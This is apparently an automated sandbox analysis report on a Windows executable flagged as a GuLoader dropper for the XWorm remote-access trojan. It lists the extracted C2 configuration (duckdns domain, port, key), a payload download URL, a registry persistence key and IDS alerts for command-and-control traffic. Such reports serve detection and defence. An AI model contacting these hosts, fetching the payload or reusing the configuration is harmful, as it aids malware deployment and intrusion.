Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sgJV11UlDP.exe

Overview

General Information

Sample name:sgJV11UlDP.exe
renamed because original name is a hash value
Original sample name:f3a3332b13baa50c41644b86efdf0fe4.exe
Analysis ID:1534200
MD5:f3a3332b13baa50c41644b86efdf0fe4
SHA1:f3b91aa55b8dce62cb614e2a43d8e3973b1d47b6
SHA256:7fd5435121f2cb4320b1bc49400152ec3fecce7f5ce0acce56f32c327126c970
Tags:32exe
Infos:

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • sgJV11UlDP.exe (PID: 3488 cmdline: "C:\Users\user\Desktop\sgJV11UlDP.exe" MD5: F3A3332B13BAA50C41644B86EFDF0FE4)
    • sgJV11UlDP.exe (PID: 6560 cmdline: "C:\Users\user\Desktop\sgJV11UlDP.exe" MD5: F3A3332B13BAA50C41644B86EFDF0FE4)
  • cleanup
{"C2 url": ["xwor3july.duckdns.org"], "Port": "9402", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4104301125.0000000033921000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.1864439498.000000000503C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: sgJV11UlDP.exe PID: 6560JoeSecurity_XWormYara detected XWormJoe Security

        System Summary

        barindex
        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sgJV11UlDP.exe, ProcessId: 6560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Afmystificeringen
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sgJV11UlDP.exe, ProcessId: 6560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Afmystificeringen
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-15T17:45:25.554637+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:45:32.651049+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:45:45.326150+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:45:55.596783+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:45:58.027618+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:08.136615+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:17.332459+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:23.501557+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:24.501602+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:25.546587+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:28.753111+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:33.517713+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:41.664779+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:42.623753+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:43.149064+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:43.518716+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:45.296248+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:45.537363+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:46.446363+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:48.771067+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:49.096956+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:49.437617+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:51.292180+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:51.417152+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:51.544193+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:52.246429+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:52.529898+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:53.138612+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:53.259764+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:54.327185+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:54.790711+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:55.568571+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:56.004986+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:57.671109+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:58.719544+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:58.840031+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:59.527377+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:59.739535+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:01.244556+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:02.307098+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:02.479914+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:04.145716+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:04.678849+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:04.803326+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:05.312029+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:05.431719+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:05.555104+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:06.084539+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:07.213714+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:08.868926+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:09.127357+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:09.387002+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:09.543030+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:09.851333+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:11.138291+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:11.475118+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:13.364947+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:16.353023+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:16.669405+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:16.964895+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:17.290407+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:17.672075+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:17.954329+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:20.575322+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:20.883903+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:21.216954+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:21.666070+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:22.169730+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:24.192264+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:24.311776+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:24.573479+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:25.270358+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:25.393549+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:25.570197+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:26.465461+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:28.630328+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:30.561112+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:30.787137+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:31.140009+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:32.008737+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:32.675746+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:32.797413+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:32.926895+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:33.221170+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:34.398495+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:34.518679+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:35.114697+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:35.114873+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:35.115412+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:35.115448+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:35.116031+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:35.116098+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:35.352076+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:35.477115+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:36.405813+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:37.081732+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:37.201927+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:37.321531+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:37.781318+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:38.538460+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:38.564095+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:38.670129+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:38.739841+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:38.961517+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:40.527937+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:40.905110+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:40.911595+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:45.968527+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:46.211962+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:47.142731+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:47.503747+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:47.767259+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:48.268252+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:48.387986+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:48.557358+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:49.780928+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:49.836475+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:49.900389+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:52.573253+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:54.057145+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:54.292163+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:54.414000+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:54.539324+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:55.237705+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:55.789742+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:55.789756+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:56.971582+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:57.400618+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:57.915504+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:58.035116+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:58.486137+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:59.701277+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:00.441001+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:01.063951+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:01.499953+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:02.294998+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:03.139103+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:04.126843+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:06.485959+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:07.406036+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:07.913123+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:09.218286+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:11.056968+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:11.908804+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:12.590826+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:13.723544+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:13.843344+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:16.130109+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:22.709768+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:25.579440+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-15T17:45:25.554637+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:45:55.596783+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:25.546587+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:55.568571+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:46:56.004986+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:25.570197+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:55.789742+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:47:55.789756+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        2024-10-15T17:48:25.579440+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.858092TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-15T17:46:52.889612+020028531931Malware Command and Control Activity Detected192.168.2.85809212.221.146.1389402TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000003.00000002.4104301125.0000000033921000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["xwor3july.duckdns.org"], "Port": "9402", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: sgJV11UlDP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.8:58053 version: TLS 1.2
        Source: sgJV11UlDP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_004062F0 FindFirstFileA,FindClose,0_2_004062F0
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004057B5
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_00402765 FindFirstFileA,3_2_00402765
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_004062F0 FindFirstFileA,FindClose,3_2_004062F0
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_004057B5 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_004057B5

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 12.221.146.138:9402 -> 192.168.2.8:58092
        Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 12.221.146.138:9402 -> 192.168.2.8:58092
        Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:58092 -> 12.221.146.138:9402
        Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:58092 -> 12.221.146.138:9402
        Source: Malware configuration extractorURLs: xwor3july.duckdns.org
        Source: unknownDNS query: name: xwor3july.duckdns.org
        Source: global trafficTCP traffic: 192.168.2.8:58092 -> 12.221.146.138:9402
        Source: Joe Sandbox ViewIP Address: 12.221.146.138 12.221.146.138
        Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /LfGiMdRCMSvlQHkIpf170.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: apslline.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: apslline.com
        Source: global trafficDNS traffic detected: DNS query: xwor3july.duckdns.org
        Source: sgJV11UlDP.exe, Busaos.pif.3.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: sgJV11UlDP.exe, Busaos.pif.3.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: sgJV11UlDP.exe, 00000003.00000002.4104301125.0000000033921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: sgJV11UlDP.exe, 00000003.00000002.4080016403.0000000003148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/
        Source: sgJV11UlDP.exe, 00000003.00000002.4081252109.0000000004D40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/LfGiMdRCMSvlQHkIpf170.bin
        Source: sgJV11UlDP.exe, 00000003.00000002.4080016403.0000000003148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/LfGiMdRCMSvlQHkIpf170.bin4
        Source: sgJV11UlDP.exe, 00000003.00000002.4080016403.0000000003148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/LfGiMdRCMSvlQHkIpf170.bino
        Source: unknownNetwork traffic detected: HTTP traffic on port 58053 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58053
        Source: unknownHTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.8:58053 version: TLS 1.2
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405252
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403248
        Source: C:\Users\user\Desktop\sgJV11UlDP.exeCode function: 3_2_00403289 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403289
